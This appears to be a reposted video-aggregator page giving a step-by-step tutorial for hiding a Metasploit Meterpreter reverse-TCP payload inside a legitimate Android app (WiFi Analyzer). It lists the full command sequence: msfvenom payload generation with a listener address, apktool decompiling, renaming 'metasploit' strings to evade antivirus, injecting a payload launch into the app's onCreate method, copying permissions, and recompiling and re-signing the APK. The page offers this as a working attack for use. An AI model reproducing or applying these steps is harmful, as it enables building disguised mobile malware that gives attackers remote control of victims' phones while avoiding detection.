Backdooring an Android APK with a Meterpreter Payload & AV Bypass

By On Saturday, October 31st, 2020 Categories : Android

Hello folks, today this website will share to you a great clip of Backdooring an Android APK with a Meterpreter Payload & AV Bypass, just see clip right after it



This video demonstrates how it is possible to embed a Meterpreter payload in a valid Android APK so that the payload is launched with the app. Additionally, I’ve included a technique for bypassing some anti-virus software.

Here is basically what I did step by step:

Install Dependencies
apt-get install lib32stdc++6 lib32ncurses5 lib32z1_

1. Generate payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=443 -o rev_tcp_443.apk

2. Decompile Apk’s
apktool d -f rev_tcp_443.apk
apktool d -f wifi-analyzer.apk

3. Modify mentions of “metasploit” in /rev_tcp_443/smali/com/metasploit/stage/Payload.smali to be “totes-legit”
cd /rev_tcp_443/smali/com/metasploit/stage/
sed -i ‘s/metasploit/toteslegit/g’ *

4. Copy payload files from /rev_tcp_443/smali/com/metasploit/stage/*
to
/com.wifi-analyzer/toteslegit/stage/

5. Edit WiFi Analyzer Manifest to locate Launcher smali
Locate android:name and action MAIN and LAUNCHER
WiFi Analyzer is at com.farproc.wifi.analyzer.MainScreen
-gedit MainScreen.smali
-Search for ;-%3EonCreate(Landroid/os/Bundle;)V
-Insert the following line right after that line
invoke-static p0, Lcom/toteslegit/stage/Payload;-%3Estart(Landroid/content/Context;)V

6. Add the Meterpreter permissions
gedit the Android Manifest of the Met Payload; copy over to Wifi Analyzer

7. Recompile APK
apktool b wifi-analyzer

8. Create a key
keytool -genkey -v -keystore wifi-analyzer.keystore -alias wifi -keyalg RSA -keysize 2048 -validity 10000

9. Sign the APK with jarsigner
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /root/Desktop/wifi-analyzer.keystore /root/Desktop/wifi-analyzer.apk wifi

The original instructions I followed can be found here: http://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/



This awesome clip was already viewed by: 6122 players and got: 92 likes.


android apk

Situs Panda will love to tell you a cool info for You guys, You can Download this perfect Backdooring an Android APK with a Meterpreter Payload & AV Bypass clip with click: HERE

Backdooring an Android APK with a Meterpreter Payload & AV Bypass | SitusPanda | 4.5